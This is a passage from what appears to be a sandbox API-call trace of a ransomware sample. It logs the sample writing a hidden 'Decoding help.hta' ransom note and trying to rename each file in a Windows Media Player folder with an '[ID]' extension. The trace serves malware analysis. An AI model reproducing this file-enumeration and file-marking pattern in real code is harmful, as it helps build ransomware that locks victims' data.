Player\\Network Sharing\\Decoding help.hta" [0042.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0xffffffff [0042.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b0 [0042.777] WriteFile (in: hFile=0x6b0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x930fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x930fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.778] CloseHandle (hObject=0x6b0) returned 1 [0042.778] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.785] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ConnectionManager.xml") returned 1 [0042.785] lstrlenW (lpString="ConnectionManager.xml") returned 21 [0042.785] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.785] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.785] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="ConnectionManager.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml" [0042.785] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml" [0042.785] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0042.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml" (normalized: "c:\\program files\\windows media player\\network sharing\\connectionmanager.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\connectionmanager.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.785] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf365935, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf365935, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2c7e17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2092, dwReserved0=0x0, dwReserved1=0x0, cFileName="ContentDirectory.xml", cAlternateFileName="")) returned 1 [0042.785] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.785] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.785] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.785] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ContentDirectory.xml") returned 1 [0042.785] lstrlenW (lpString="ContentDirectory.xml") returned 20 [0042.785] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.785] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.785] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="ContentDirectory.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml" [0042.785] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml" [0042.785] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0042.786] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml" (normalized: "c:\\program files\\windows media player\\network sharing\\contentdirectory.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\contentdirectory.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.795] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf38ba92, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf38ba92, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MediaReceiverRegistrar.xml", cAlternateFileName="")) returned 1 [0042.795] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.795] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.795] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.795] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MediaReceiverRegistrar.xml") returned -1 [0042.795] lstrlenW (lpString="MediaReceiverRegistrar.xml") returned 26 [0042.795] lstrcmpiW (lpString1="[ID]", lpString2=".xml") returned 1 [0042.795] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.795] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.795] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="MediaReceiverRegistrar.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml" [0042.795] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml" [0042.795] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0042.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml" (normalized: "c:\\program files\\windows media player\\network sharing\\mediareceiverregistrar.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\mediareceiverregistrar.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.795] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf38ba92, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf38ba92, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5352, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw120.jpg", cAlternateFileName="")) returned 1 [0042.795] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.796] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.796] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.796] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_bw120.jpg") returned -1 [0042.796] lstrlenW (lpString="wmpnss_bw120.jpg") returned 16 [0042.796] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.796] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.796] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_bw120.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg" [0042.796] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg" [0042.796] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0042.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw120.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw120.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.796] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf38ba92, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf38ba92, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1922, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw120.png", cAlternateFileName="")) returned 1 [0042.796] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.796] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.796] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.796] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_bw120.png") returned -1 [0042.796] lstrlenW (lpString="wmpnss_bw120.png") returned 16 [0042.796] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.796] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.796] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_bw120.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png" [0042.796] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png" [0042.797] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.[ID]g9uZrLhJaygpwRm1[ID]" [0042.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw120.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw120.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.797] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3b1bef, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3b1bef, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc38, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw32.bmp", cAlternateFileName="")) returned 1 [0042.797] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.797] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.797] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.797] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_bw32.bmp") returned -1 [0042.797] lstrlenW (lpString="wmpnss_bw32.bmp") returned 15 [0042.797] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.797] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.797] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_bw32.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp" [0042.797] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp" [0042.797] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0042.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw32.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw32.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.813] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3b1bef, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3b1bef, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x231f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw32.jpg", cAlternateFileName="")) returned 1 [0042.813] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.813] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.813] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.813] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.813] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_bw32.jpg") returned -1 [0042.814] lstrlenW (lpString="wmpnss_bw32.jpg") returned 15 [0042.814] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.814] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_bw32.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg" [0042.814] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg" [0042.814] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0042.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw32.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw32.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.814] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3d7d4c, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf3d7d4c, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2edf75, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x980, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_bw48.bmp", cAlternateFileName="")) returned 1 [0042.814] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.814] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" [0042.814] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\network sharing\\decoding help.hta")) returned 0x1 [0042.814] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpnss_bw48.bmp") returned -1 [0042.814] lstrlenW (lpString="wmpnss_bw48.bmp") returned 15 [0042.814] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.814] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="wmpnss_bw48.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp" [0042.814] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp" | 